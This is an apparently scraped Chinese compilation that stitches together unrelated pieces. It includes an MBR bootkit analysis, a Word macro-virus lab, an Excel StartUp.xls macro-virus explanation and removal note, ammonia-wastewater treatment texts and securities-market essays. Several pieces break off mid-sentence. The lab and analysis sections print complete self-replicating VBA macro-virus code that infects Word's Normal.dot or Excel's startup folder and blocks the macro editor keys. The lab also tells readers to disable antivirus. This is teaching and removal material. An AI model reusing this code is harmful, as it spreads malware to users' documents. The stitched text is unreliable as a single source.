MBR病毒分析

MBR病毒分析

Date：2010.10.29

Author：Cryin’

Blog：https://www.360docs.net/doc/ba10983793.html,/justear

一、基础知识

1、Windows启动过程

系统引导过程主要由以下几个步骤组成(以硬盘启动为例)

1、开机;

2、BIOS加电自检(POST---Power On Self Test),内存地址为0fff:0000;

3、将硬盘第一个扇区(0头0道1扇区,也就是Boot Sector)读入内存地址0000:7c00处;

4、检查(WORD)0000:7dfe是否等于0xaa55.若不等于则转去尝试其他介质;如果没有其

他启动介质,则显示”No ROM BASIC”,然后死机;

5、跳转到0000:7c00处执行MBR中的程序;

6、MBR先将自己复制到0000:0600处,然后继续执行;

7、在主分区表中搜索标志为活动的分区.如果发现没有活动分区或者不止一个活动分区,

则停止;

8、将活动分区的第一个扇区读入内存地址0000:7c00处;

9、检查(WORD)0000:7dfe是否等于0xaa55,若不等于则显示“Missing Operating System”,

然后停止,或尝试软盘启动;

10、跳转到0000:7c00处继续执行特定系统的启动程序;

11、启动系统.以上步骤中(2),(3),(4),(5)步由BIOS的引导程序完成;(6),(7),(8),(9),(10)

步由MBR中的引导程序完成.

Windows启动过程主要由以下几个步骤组成，其中vista和win7可一概而论；

2、硬盘主引导区结构

硬盘的主引导区在0柱面0磁道1扇区，包括硬盘主引导记录MBR（Main Boot Record）、

四个分区表DPT（Disk Partition Table）信息和主引导记录有效标志字三部分，如表所示：

主引导记录MBR从0000H开始到00D9H结束，共218个字节。MBR的作用就是检查分区表是否正确以及确定哪个分区为引导分区，并在程序结束时把该分区的启动程序（也就是操作系统引导扇区）调入内存加以执行。MBR是由分区程序（例如DOS的Fdisk.exe）产生的，在不同的操作系统平台下，这个扇区的内容可能不完全相同。主引导记录比较容易编写，例如，我们自己也可以编写一个这样的程序，只要能完成前述的任务就可以了（参见网上资料“主引导扇区代码（MBR）”）。正是因为主引导记录容易编写，所以才出现了很多的引导区病毒（eeye bootroot、Vbootkit、Stoned bootkit、Sinowal等）。

我们都知道，任何硬盘最多只能有四个分区。分区表自偏移01BEH处开始，共64个字

节，表中可填入四个分区信息，每16个字节为一个分区说明项，这16个字节含义如分区表结构信息表（偏移量）所示。

图：分区表结构信息表（偏移量）

分区表每一项结构简介

BYTE State:分区状态,0=未激活,0x80=激活(注意此项);

BYTE StartHead:分区起始磁头号;

WORD StartSC:分区起始扇区和柱面号,底字节的底6位为扇区号,高2位为柱面号的第9,10位,高字节为柱面号的低8位;

BYTE Type:分区类型,如0x0B=FAT32,0x83=Linux等,00表示此项未用;

BYTE EndHead:分区结束磁头号;

WORD EndSC:分区结束扇区和柱面号,定义同前;

DWORD Relative:在线性寻址方式下的分区相对扇区地址(对于基本分区即为绝对地址);

DWORD Sectors:分区大小(总扇区数).

3、MBR病毒感染基本思想

MBR病毒感染的基本思想，首先是读取主引导记录和把分区表从主引导记录中复制出来。然后，MBR病毒把自己的包含恶意二进制数据的主引导记录放到主引导扇区，并复制新的分区表到它。但是，并非只有分区表需要保留，还有微软公司原来的主引导记录也需要保存下来。为此，MBR病毒复制原始主引导记录到其它64个未用到的扇区。到MBR病毒执行完自己的操作后在读取原始的主引导记录并跳到0x7c00处执行来引导开机。

二、样本分析

1、常驻内存

最早设计DOS操作系统时，PC机的硬件系统只支持1M字节的寻址空间，所以DOS 只能直接管理最多1M字节的连续内存空间。在这1M内存中，仅有640K被留给应用程序使用，它们被称为常规内存或基本内存(Base Memory)。

在内存0040h:0013h开始处的两个字节描述了内存中未用内存的高端位置，它的值是KB的倍数。病毒程序首先将自身复制到内存的高端，修改内存容量标志单元0:413H，在原有值的基础上减去病毒长度，使得病毒的int13h能够常驻内存，并将原int13h磁盘中断服务程序的中断向量保存，然后将该中断向量置成新的int13h中断程序入口，即加上一段病

毒感染程序，每次调用int13时病毒程序就会被执行。

以上代码实现为病毒程序预备4KB的常规内存以实现代码常驻内存。

2、HOOK INT13

BIOS Int13H调用是BIOS提供的磁盘基本输入输出中断调用，它可以完成磁盘(包括硬盘和软盘)的复位，读写，校验，定位，诊断，格式化等功能。所以MBR病毒一般都是通过HOOK int13h执行恶意代码。

以上代码实现对INT13H的HOOK，并将原始int13h的入口INT13HANDLER保存并使其指向新的入口点@Int13Hook。

3、HOOK NTLDR

在HOOK INT13H部分完成后需要对NTLDR进行HOOK，所以在HOOK INT13H中断操作中需要对NTLDR的特征码进行扫描。

以上代码实现对NTLDR OSLoder模块里的6字节进行扫描，并在FFh/15h:使用CALL NEAR [OFS32]指令进行NTLDR HOOK，该指令寻址采用绝对地址，类似指令也可以。HOOK之后置CALL NEAR[OFS32]指令跳转到恶意代码的地址处执行。

3、HOOK NTOSKRNL

当代码再次运行到NTLDR OSLoder被HOOK处时，就会执行恶意代码，此时代码运行在保护模式下。在这里通过扫描_BlLoaderData模块基址来获取NTOSKRNL的镜像地址。通过PE搜索NTOSKRNL.EXE的导出函数，并对NTOSKRNL的导出函数KeAddSystemServiceTable进行HOOK。因为进程SMSS.EXE会加载WIN32K.SYS，当WIN32K.SYS初始化时，它必须调用KeAddSystemServiceTable来为用户以及GDI系统程序提供注册。所以通过对这个函数HOOK操作，可以更快更好的把它加载到执行的WIN32K.SYS中，同时我们可以使用免费的系统服务表(_W32pServiceTable)和相应的参数表(_W32pArgumentTable)。

对KeAddSystemServiceTable的HOOK主要是通过HOOK NtUserRegisterClassExWOW 这个系统调用函数来实现的，因为那个函数没有输出，因此需要一点更复杂的操作。针对这个问题，我们的答案是通过对在W32pServiceTable的代码进行逐个函数扫描，直到找到NtUserRegisterHotkey。一旦发现这个函数，就替换掉WIN32K系统表的入口并用一个指针指到我们自己的钩子函数处，最终替换掉原先这个函数的指针，并从已恢复运行的KeAddSystemServiceTable中脱掉钩子。

该NtUserRegisterClassExWOW钩子函数并不复杂，它只用来比较这个类的名称(都2个参数与一个unicode字符串指针)和SAS Windows class来完成匹配，它用我们在用户映射的用户共享数据中的那个更换过的SASWndProc代码来替换掉‘lpfnWndProc领域中的WNDCLASSEXW结构，替换完后再把在PEB特定位置的原始函数指针进行存储操作。对NtUserRegisterClassExWOW的HOOK操作可以截获所有的应用层程序窗口类，以便再次HOOK窗口类操作，此时代码就运行到NT的应用层模式下了。

经过在开源代码基础之上的试验，成功实现在Winlogon加载之前运行一个CMD实例。参考文献：

NTFS文件系统启动扇区代码

主引导扇区代码（MBR）

FAT文件系统启动扇区代码

扩展INT13H调用规范

驻留程序设计TSR(Terminate but Stay Resident)

PE文件格式

NTLDR源代码及分析

Bochs调试

Windbg与VMWare的连接调试

80x86汇编程序设计与保护模式概念

涉及工具：

Masm6.11

Nasm

IDA5.0

Bochs

Windbg

WinHex

参考开源项目：

eeye bootroot、Vbootkit、Stoned Bootkit、Sinowal Bootkit、ROMOS。

Date：2010-5-26

Author：Cryin

Link:https://www.360docs.net/doc/ba10983793.html,/justear/blog

注：文中多数内容均来自互联网，时间仓促，加上本人菜鸟初学，可能有遗漏、甚至错误的地方。还有在实际编程中对于保护模式下线性寻址的理解并不是很明确，所以未在本文中提及。对于后续的扩展的思考，bios后门的开发只需要前面加一个hook int19的模块即可实现，网上亦有同类文章可参考学习。

Word宏病毒

Word宏病毒 1.实验目的(后果自负) Word宏是指能组织到一起为独立命令使用的一系列Word指令，它能使日常工作变得容易。本实验演示了宏的编写，通过两个简单的宏病毒示例，说明宏的原理及其安全漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。 2.实验所需条件和环境 硬件设备：局域网，终端PC机。 系统软件：Windows系列操作系统 支撑软件：Word 2003 软件设置：关闭杀毒软；打开Word 2003，在工具→宏→安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic项目的访问 实验环境配置如下图所示： 受感染终端 受感染 Word文档 被感染终端宏病毒传播示意图 3.实验内容和分析 为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过

多的word文档，否则清除比较麻烦（对每个打开过的文档都要清除）。 3.1. 例1 自我复制，感染word公用模板和当前文档 代码如下： 'Micro-Virus Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False Options.SaveNormalPrompt = False Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If With Host If .Lines(1.1) <> "'Micro-Virus" Then .DeleteLines 1, .CountOfLines .InsertLines 1, Ourcode .ReplaceLine 2, "Sub Document_Close()" If ThisDocument = nomaltemplate Then .ReplaceLine 2, "Sub Document_Open()" ActiveDocument.SaveAs ActiveDocument.FullName End If End If End With MsgBox "MicroVirus by Content Security Lab" End Sub 打开一个word文档，然后按Alt+F11调用宏编写窗口（工具→宏→Visual Basic→宏编辑器）,在左侧的project—>Microsoft Word对象→ThisDocument中输入以上代码，保存，此时当前word文档就含有宏病毒，只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open），此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。 3.1.1.代码解释 以上代码的基本执行流程如下： 1)进行必要的自我保护 Application.DisplayStatusBar = False Options.SaveNormalPrompt = False 高明的病毒编写者其自我保护将做得非常好，可以使word的一些工具栏失效，例如将

高氨氮废水处理方法

高氨氮废水的一般的形成是由于氨水和无机氨共同存在所造成的，一般上ph在中性以上的废水氨氮的主要来源是无机氨和氨水共同的作用，ph在酸性的条件下废水中的氨氮主要由于无机氨所导致。废水中氨氮的构成主要有两种，一种是氨水形成的氨氮，一种是无机氨形成的氨氮，主要是硫酸铵，氯化铵等等。 高氨氮废水如何处理，我们着重介绍一下其处理方法： 1 物化法 1.1 吹脱法 在碱性条件下，利用氨氮的气相浓度和液相浓度之间的气液平衡关系进行分离的一种方法，一般认为吹脱与湿度、PH、气液比有关。1.2 沸石脱氨法 利用沸石中的阳离子与废水中的NH4+进行交换以达到脱氮的目的。应用沸石脱氨法必须考虑沸石的再生问题，通常有再生液法和焚烧法。采用焚烧法时，产生的氨气必须进行处理。 1.3 膜分离技术 利用膜的选择透过性进行氨氮脱除的一种方法。这种方法操作方便，氨氮回收率高，无二次污染。例如：气水分离膜脱除氨氮 氨氮在水中存在着离解平衡，随着PH升高，氨在水中NH3形态比

例升高，在一定温度和压力下，NH3的气态和液态两项达到平衡。根据化学平衡移动的原理即吕．查德里（A.L.LE Chatelier）原理。在自然界中一切平衡都是相对的和暂时的。化学平衡只是在一定条件下才能保持“假若改变平衡系统的条件之一，如浓度、压力或温度，平衡就向能减弱这个改变的方向移动。”遵从这一原理进行了如下设计理念在膜的一侧是高浓度氨氮废水，另一侧是酸性水溶液或水。当左侧温度T1＞20℃,PH1＞9,P1＞P2保持一定的压力差，那么废水中的游离氨NH4+,就变为氨分子NH3,并经原料液侧介面扩散至膜表面，在膜表面分压差的作用下，穿越膜孔，进入吸收液，迅速与酸性溶液中的H+反应生成铵盐。 1.4MAP沉淀法 主要是利用以下化学反应：Mg2++NH4++PO43-=MgNH4PO4 理论上讲以一定比例向含有高浓度氨氮的废水中投加磷盐和镁盐，当[Mg2 + ][NH4+][PO43 -]>2.5×10–13时可生成磷酸铵镁（MAP），除去废水中的氨氮。 1.5 化学氧化法 利用强氧化剂将氨氮直接氧化成氮气进行脱除的一种方法。折点加氯是利用在水中的氨与氯反应生成氨气脱氨，这种方法还可以起到杀菌作用，但是产生的余氯会对鱼类有影响，故必须附设除余氯设施。

宏病毒原理及防范

宏病毒原理及防范 一、常见宏病毒 1．startup宏病毒 宏病毒其实并不神秘，其工作原理是借用宏表4.0的auto_open事件启动病毒代码的复制和病毒文件的新建，新建的文件常放在xlsrt文件夹下。然后利用xlstart文件夹文件可以自动启动的原理把病毒代码复制到新打开的excel文件中。下面先看看startup宏病毒代码吧，注意红字部分。 Sub auto_open() On Error Resume Next If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then Application.ScreenUpdating = False ThisWorkbook.Sheets("StartUp").Copy ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls") n$ = https://www.360docs.net/doc/ba10983793.html, ActiveWindow.Visible = False Workbooks("StartUp.xls").Save Workbooks(n$).Close (False) End If Application.OnSheetActivate = "StartUp.xls!cop" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnKey "%{F8}", "StartUp.xls!escape" End Sub Sub cop() On Error Resume Next If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then Application.ScreenUpdating = False n$ = https://www.360docs.net/doc/ba10983793.html, Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1) Sheets(n$).Select End If End Sub 2．book1病毒 book1病毒最明显的标志是打开excel时自动跳出一个book1空文件。这种病毒和startup病毒工作原理相似，但启动方式不太一样，该病毒会在excel文件中添加和复制一个宏表，利用宏表4。0程序的auto_open事件启动宏表中的宏代码，进行代码复制，病毒文件创建。打开中了book1病毒文件，在插入-名称里会出现很多陌生的定义名称，这些都是病毒启动名称。 二、病毒专杀 1．手工专杀 strartup.xls病毒。首先把宏的安全性设置为最高级，禁止所有宏运行。然后在电脑中搜索xlstart文件夹，找到后把该文件夹中的strartup.xls文件

中国证券市场存在问题及对策研究

证券与投资分析 中国证券市场存在问题及对策研究 系别：管理科学与工程 专业：工商管理 姓名：李志强 学号：021140202 中国地质大学长城学院 2015年12月24日

中国证券市场存在问题及对策研究 【摘要】证券市场是市场经济发展到一定阶段的产物。经历了二十多年的发展，我国证券市场取得了令世人瞩目的成就，成为市场经济体系的重要组成部分，在社会经济发展中的地位日渐突出。我国经济持续快速增长，同时也促进了证券市场的快速发展；证券市场的快速发展，同时加快了投融资体制的改革，加速了企业重组和产业结构调整的步伐，进一步推动了国民经济持续健康稳定发展。但由于我国证券市场起步较晚，在发展中也暴露出了不少问题。规范市场成为保证和促进证券市场发展的首要任务。用什么来规范市场，由谁来规范市场，如何对市场进行规范，这就是证券市场健康持续发展所必须要解决的问题，也正是本文要探讨的问题。 【关键词】证券市场；规范发展；原因分析；对策 一、我国证券市场主要存在以下问题 （一）对于影响证券市场的信息披露存在很多问题 1．信息披露虚假。一是发行人为获得发行资格，采取虚增资产、虚减负债、增加待摊费用等方法，达到以虚假信息包装公司形象的目的。二是发行人信息披露的具体内容缺乏有效性，反映公司信息的合并会计报表过于笼统和模糊，难以揭示不同地区的盈利水平、经济增长趋势和风险状况。三是我国部分上市公司在披露信息时措辞含糊、模棱两可。 2．信息披露不及时。上市公司的信息是时效性极强的资源，信息披露的滞后会直接影响投资者的收益。 3．信息披露不公平。上市公司的消息还没有在证监会指定各大报纸上刊登，却已由其它渠道泄露出来，对中、小散户极不公平。内幕消息的存在是我国现阶段股市的重要特征。（二）机构投资者的违规违法情况严重 目前，我国证券市场从人数上看个人投资者占总开户人数的99.7%，机构投资者只占0.3%。但是机构投资者拥有80%左右的流通证券余额，个人投资只拥有20%左右的流通证券余额。通常一些大的机构投资者会用一些不正当的手段来操纵证券市场，以此获利，而散户因此被套牢，损失严重，这种违背社会道德的投机行为，使得证券市场的投资功能、转制功能等都不能得到很好的发挥，阻碍了我国证券市场的健康发展。 （三）证券市场法律制度不健全、监管不严 证券市场制度是支撑证券市场高效、公平运转的基础。近年来我国已制定了《公司法》、《股票发行与交易暂行条例》、《证券交易所管理办法》等，但证券法规没有形成完整的体系，导致证券交易的某些环节无法可依，加之对已颁布的法规执行不力，证券交易的违规和不规范行为时有发生，我国1995 年发生的“三?二七”国债期货的严重事件，主要原因就是证券法规不健全、监管不严造成的。我国有关证券市场的法律制度不健全，这一点在有关证券市场的民事法律责任制度方面尤为明显。 （四）上市公司的法人治理结构不完善 我国证券市场缺乏完善的法人治理结构。首先，董事会职责不清，职权过于集中，其他董事没有说话的权利，公众股太过分散，董事会受大股东操纵。其次，总经理权利不能得到有效制约，通常总经理在处理公司日常工作时，所有行使职权必须在董事会决议为基础并向董事会报告，但实际上，总经理改变董事会甚至股东大会决策的情况时有发生。证券交易中心从组织形式上来看，基本上是会员制形式、公司制运作。在业务范围上，有的证交中心自成系统、上市交易自己的品种、有自己独立的业务范围而不与证交所联网；也有的证交中心既有自己独立的业务品种，又与沪深证交所有联网业务。整个市场缺乏必要的统一布局，市

清除宏病毒

清除宏病毒，名字是：StartUp.xls方法 --大白菜 文中图片都很小，看不清楚，可以用以下快捷方式：按住ctrl 向上滚动鼠标滑轮可以放大word，就可以看清楚图片了 病毒样本如下：（下面是宏病毒代码，电脑知识欠缺的，千万被乱动哦，小心弄巧成拙） Vba代码 =================宏病毒代码复制从下一行开始================= Sub auto_open() On Error Resume Next If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then Application.ScreenUpdating = False ThisWorkbook.Sheets("StartUp").Copy ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls") n$ = https://www.360docs.net/doc/ba10983793.html, ActiveWindow.Visible = False Workbooks("StartUp.xls").Save Workbooks(n$).Close (False) End If Application.OnSheetActivate = "StartUp.xls!cop" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnKey "%{F8}", "StartUp.xls!escape" End Sub Sub cop() On Error Resume Next If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then Application.ScreenUpdating = False n$ = https://www.360docs.net/doc/ba10983793.html,

氨氮废水处理方法

高氨氮废水处理技术 介绍各类氨氮废水处理技术及其原理，包括各种方法的优缺点、适用范围、高浓度氨氮废水处理技术的研究进展。通过对比分析，明确不同类型高氨氮废水处理的选择方法，为治理高氨氮废水提供一条便捷的选择方法。 近年来，随着环境保护工作的日益加强，水体中有机物的代表指标-COD基本上得到有效控制，但是，含高氨氮废水达标排放没有得到有效控制，未经处理的含氮废水排放给环境造成了极大的危害，如易导致湖泊富营养化，海洋赤潮等。本文总结了国内外高氨氮废水处理技术及其优缺点、适用范围等。 1、废水中氨氮处理的主要技术应用与新进展 1.1吹脱法 吹脱法是将废水中的离子态铵(NH4+)，通过调节pH值转化为分子态氨，随后被通入的空气或蒸汽吹出。影响吹脱效率的主要因素有：pH值、水温、布水负荷、气液比、足够的气液分离空间。 NH4++OH-→NH3+H2O 炼钢、石油化工、化肥、有机化工等行业的废水，常含有很高浓度的氨，因此常用蒸汽吹脱法处理，回收利用的氨部分抵消了产生蒸汽的高费用。石灰一般用来提高pH值。用蒸汽比用空气更易控制结垢现象，若用烧碱则可大大减轻结垢的程度。吹脱法一般采用填料吹脱塔，主要特征是在塔内装置一定高度的填料层，利用大表面积的填充塔来达到气水充分接触，以利于气水间的传质过程。常用的填料有拉西环、聚丙烯鲍尔环、聚丙烯多面空心球等。胡允良等人研究了某制药厂生产乙胺碘呋酮时产生的一部分高浓度氨氮废水的静态吹脱效果。结果表明：当pH=10～13，温度为30～50℃时，氨氮吹脱率为70.3%～99.3%。 氨吹脱法通常用于高浓度氨氮废水的预处理，该处理技术优点在于除氨效果稳定，操作简单，容易控制。但如何提高吹脱效率、避免二次污染及如何控制生产过程水垢的生成都是氨吹脱法需要考虑的问题。 1.2化学沉淀法(MAP法)

宏病毒分析及清除实验

实验五宏病毒分析及清除实验 姓名：xxx 学号：xxxxxxxx 日期：2014年4月26日 专业：计算机科学与技术 一、实验目的 ?了解“宏病毒”机理； ?掌握清除宏病毒的方法； ?掌握采用“宏”和脚本语言进行编程的技术。 二、实验环境 ?Windows2003操作系统； ?Office Word2003字处理软件。 三、实验内容 1．软件设置 关闭杀毒软件；打开Word字处理软件，在工具“宏”的“安全性”中，将“安全级”设置为低，在“可靠发行商”选项卡中，选择信任任何所有安装的加载项和模板，选择“信任visual basic项目的访问”。 注意：为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过多的word文档，否则清除比较麻烦（对每个打开过的文档都要清除）。 2．自我复制功能演示 打开一个word文档，然后按Alt+F11调用宏编写窗口（工具“宏”“Visual Basic宏编辑器”）,在左侧的“project—>Microsoft Word”对象“ThisDocument”中输入以下代码（Macro-1），保存，此时当前word文档就含有宏病毒，只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open），此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。 完整代码如下：

中国证券行业分析报告

目 录 前 言 中国证券行业分析报告 【最新资料，WORD 文档，可编辑修改】

证券市场的不断发展完善，行业持续发展前景看好。2013年证券市场基础制度和法制建设稳步推进，多层资本市场建设取得了重要进展，新三板市场推向全国，证券公司柜台市场平稳起步；证券监管部门进步一放松管制、加强监管，积极保护中小投资者的利益，为资本市场的良好运转提供保障；证券公司整体功能得到扩展，行业的创新和服务能力加强，尤其创新业务发展迅速，资产业务规模继续大幅增长。 互联网金融发展趋势，新制度促进传统业务转型。互联网金融起步，证券公司开始尝试搭建网络综合服务平台，通过网上开户、在线理财等信息技术手段扩展金融服务渠道。即将出台的取消″一人一户″行业政策，低佣金率、高服务质量的企业将会在新的竞争格局中略胜一筹。 国际化竞争加强，行业格局迎来新的调整。行业新一轮并购重组启动，国际化探索取得阶段性成果，随着行业市场不断国际化，外资公司不断加入，行业的竞争格局迎来新的调整良机。 迎合市场需求，发展互联网经纪业务，与大型互联网公司合作是证券公司发展的新方向。对券商板块基本运营而言，传统经纪业务的下行对应着互联网新兴经纪业务的蓬勃发展，互联网与经纪业务的侵蚀与融合将发展到一个更高的层次。 一、中国证券市场的发展概况 证券市场是金融市场的重要组成部分，在金融体系中居于重要地位。证券市场的三大基本功能是筹资、资本定价、资源配置。目前，证券行业已成为我国国民经济中的一个重要行业，对推动国民经济增长作出了重大贡献。 作为金融市场的重要组成部分，证券市场在金融市场体系中占据着重要的地位，其资源配置与资本定价两大基本职能在推动中国国民经济的快速发展过程中发挥了重要作用。 1990年，上海证券交易所、深圳证券交易所的成立标志着中国证券市场正式诞生。1999年《证券法》的实施及2006年《证券法》和《公司法》的修订，使中国证券市场在法制化建设方面迈出了重要步伐。2004年1月国务院《关于推进资本市场改革开放和稳定发展的若干意见》的出台标志着中央政府对证券市场发展的高度重视。此后中国证券市场进行了一系列重大制度变革，主要包括实施股权分置改革、提高上市

实验三 脚本病毒和宏病毒分析

实验三脚本病毒和宏病毒分析 一、实验目的 通过这项实验旨在使学生掌握Office下宏病毒的基本原理，主要包括它的传染机制、破坏机制以及怎样清除Office下的宏病毒。 二、实验环境 操作系统环境：Windows98/NT/2000/XP 编程环境：Office VBA 三、实验基础知识要求 Office VBA编程环境 四、实验任务 1．任务性质：验证性实验 2．任务描述：下面的示例中给出的是一个Word宏病毒的示例程序（只有传染模块），仔细阅读源程序，掌握Word宏病毒的传染过程。 3．任务步骤： （1）打开Word2000，新建一个文档名为“test”； （2）点击“工具－宏－宏”，在对话框“宏的位置”选择“test”，在宏名中输入“autoclose”，然后点击“创建”按钮； （3）在VBA编辑环境中输入示例程序中给出的代码，并保存，然后退出VBA； （4）点击“工具－宏－宏”，在对话框中点击“管理器”按钮，在管理器对话框中点击“宏方案项”标签；在宏方案项有效范围的“test.doc”中将“NewMacros”改名为“AOPEDMOK”； （5）点击“工具－宏－安全性”，在安全性对话框中的安全级标签中选择“低”，在可靠性来源标签中选择“信任对VB项目的访问”； （6）保存并关闭“test”文档； （7）新建一个文档test1，关闭后重新打开，观察test1是否被感染。 （8）清除此宏病毒，即要同时删除normal模板、所有活动模板、和染毒文件的autoclose 宏。 4．示例程序 Sub autoclose() ' autoclose Macro ' 宏在2005-8-26 由jingjd 创建 On Error Resume Next Application.DisplayAlerts = wdAlertsNone Application.EnableCancelKey = wdCancelDisabled Application.DisplayStatusBar = False 'Options.VirusProtection = False Options.SaveNormalPrompt = False Const VirusName = "AOPEDMOK" 'MsgBox ActiveDocument.VBProject.VBComponents.Item(2).Name 'MsgBox ActiveDocument.VBProject.VBComponents(2).Name Set Doc = ActiveDocument.VBProject.VBComponents Set Tmp = NormalTemplate.VBProject.VBComponents Const ExportSource = "E:\aopedmok.txt" For j = 1 To Doc.Count

中国证券分析师行业的现状与发展思路

中国证券分析师行业的现状与发展思路 中国证券分析师行业伴随着中国证券市场的脚步已经走过十几年的发展历程,十几年来,证券分析师队伍从无到有,不断壮大,已经成为普及证券知识、推动理性投资和证券市场规范化发展的一支不可忽视的力量。当前,中国证券分析师行业正面临国内证券市场快速发展和加入世贸组织后外国同业竞争的双重挑战,这一新形势既蕴藏着发展的新机遇,又急切呼唤着新的改革。 中国证券分析师行业的发展历程和现状 中国证券分析师行业是伴随着中国证券市场的发展而发展壮大起来的,以管理部门实现监管为标准,其发展历程可以分为三个阶段。 第一阶段是起步阶段(1984—1991)。这个阶段是证券分析师行业的萌芽和孕育阶段。在这个阶段,中国证券市场刚刚开始,管理层、上市公司、证券公司和投资者都在“摸着石头过河”,全国性的有形交易市场尚未形成。在一些大城市一级半市场上,开始有人研究股市行情,传递信息,指导操作,但尚未形成稳定的证券咨询群体。 第二阶段是自发阶段(1991—1998)。这个阶段是证券分析师行业飞速发展阶段,也是管理部门监管处于真空的阶段。20世纪90年代初证券市场成立之时,为适应证券公司的需要,

证券咨询部门纷纷成立,最早是从券商的客户服务部门开始,准确地说是营业部对股民进行的“入门指导”,离严格意义上的咨询业务相距甚远。在这一阶段,证券市场刚刚成立,投资者还比较陌生,此时,证券分析师的作用更多的是起到一个“入门指导”的作用。接着,我国证券市场迎来了一个飞速发展的过程,由于证券市场投机风气弥漫,投资者的投资决策基本上是建立在对“政策”“、庄家”、“内幕消息”等概念上,为迎合投资者投机的需要,各类“股评家“”股评人士”“、市场人士”、“证券研究员”活跃在证券交易所和各种新闻媒体之上,新闻媒体也推波助澜,而且市场缺乏政策监管。在这种大环境下,证券分析师行业出现了大量的违规行为。 第三阶段是规范发展阶段(1998—至今)。这个阶段是证券分析师行业规范发展的阶段,各类管理法规和条规相继出台,管理部门开始监管。面对证券咨询业的放任自流和大量违规行为的出现,监管层开始引起注意,1998年4月1日《证券期货投资咨询管理暂行办法》及其《实施细则》公布并实施,开始对从业机构和人员实行资格审查,加上其后颁布执行的《证券法》,中国证券咨询监管法规在某些方面甚至比香港同类法规还要严格。2000年7月16日我国颁布实行了《中国分析师职业道德守则》,并且在2002年12月13日成立证券业协会证券分析师委员会,使证券分析师的管理趋于规范。但是,多年监管空缺造成行业总体素质偏低和短期的投机心态

吹脱法处理高浓度氨氮废水

吹脱法处理高浓度氨氮废水 作者：周明罗陈建中刘志勇 简介：对垃圾渗滤液处理难点进行了分析，阐述了垃圾渗滤液国内外处理现状、处理工艺对比、以及存在弊端，概述OFR新型专利技术处理垃圾渗滤液的原理、使用范围、技术优势及其推广方向，提出OFR 技术在高浓度有机废水处理有特殊的效果，已成功使用于国内外多家企业，尤其在垃圾渗滤液前预处理和经膜技术处理后的浓液处理方面有广阔的使用前景。 关键字：垃圾渗滤液浓缩液氨氮 高浓度氨氮废水来源甚广且排放量大。如化肥、焦化、石化、制药、食品、垃圾填埋场等均产生大量高浓度氨氮废水。大量氨氮废水排入水体不仅引起水体富营养化、造成水体黑臭，而且将增加给水处理的难度和成本，甚至对人群及生物产生毒害作用[1]。氨氮废水对环境的影响已引起环保领域和全球范围的重视，近20 年来，国内外对氨氮废水处理方面开展了较多的研究。其研究范围涉及生物法、物化法的各种处理工艺，如生物方法有硝化及藻类养殖；物理方法有反渗透、蒸馏、土壤灌溉；化学法有离子交换法、氨吹脱、化学沉淀法、折点氯化、电化学处理、催化裂解等。新的技术不断出现，在处理氨氮废水的使用方面展现出诱人的前景。本文侧重介绍吹脱法处理高浓度氨氮废水的技术特点及研究使用。 1 吹脱技术 吹脱法用于脱除水中氨氮，即将气体通入水中，使气液相互充分接触，使水中溶解的游离氨穿过气液界面，向气相转移，从而达到脱除氨氮的目的。常用空气作载体（若用水蒸气作载体则称汽提）。 水中的氨氮，大多以氨离子（NH4+）和游离氨（NH3）保持平衡的状态而存在。其平衡关系式如下： NH4++OH-NH3+H2O （1） 氨和氨离子之间的百分分配率可用下式进行计算： Ka=Kw /K b=（C NH3·C H+）/C NH4+（2） 式中：Ka———氨离子的电离常数；

令人心烦的excel宏病毒终于清除了-推荐下载

令人心烦的excel宏病毒终于清除了!我如释重负地吁了口气，脑子一下子轻松了许多。你可能不知道，为了清除这个excel宏病毒，几天来，搞得我头昏脑胀。 大约两三个星期前，同事罗某告诉我，下面报上来的excel表，打开后出现了奇怪的现象：会自动打开一个book1的电子表格。他让我帮忙解决一下。我初步判断是宏病毒，默认打开的book1可能是excel的模板。我先“另存为”文件，找到book1的位置，删掉。同时把excel的宏安全性设置为高，禁止运行来历不明的宏，问题即解决了。 恰巧到下面去检查工作，某单位反映，电脑中病毒了，所以没有及时交表格。一问情况，与罗某讲的情况一样。我主动表示去“搞搞看”。但是情况并非如我猜想的那样。情况是：如果将宏的安全性设为非常高，禁用宏，会弹出一个警告：“出现了一个不能被禁止、又无法签署的Microsoft Excel 4.0 宏”，该表打不开；如果要打开这个表，必须降低excel宏安全性等级，将它设为中或低，即运行宏病毒，但又多出了一个book1表。即使将book1删除，仍然不行。面对这个新病毒，当时我不知该怎么办。 没过两天，罗某又来找我，说又出现了一种现象。我去看了，正与上次在下面检查时看到了excel 4.0 宏病毒一模一样。而且，下面有几个单位都说出现了宏病毒，上报来的表格中都有上面讲的问题。而且办公室有三台电脑都感染了excel 4.0 宏病毒。这么多的电脑感染了，引起了我的兴趣。

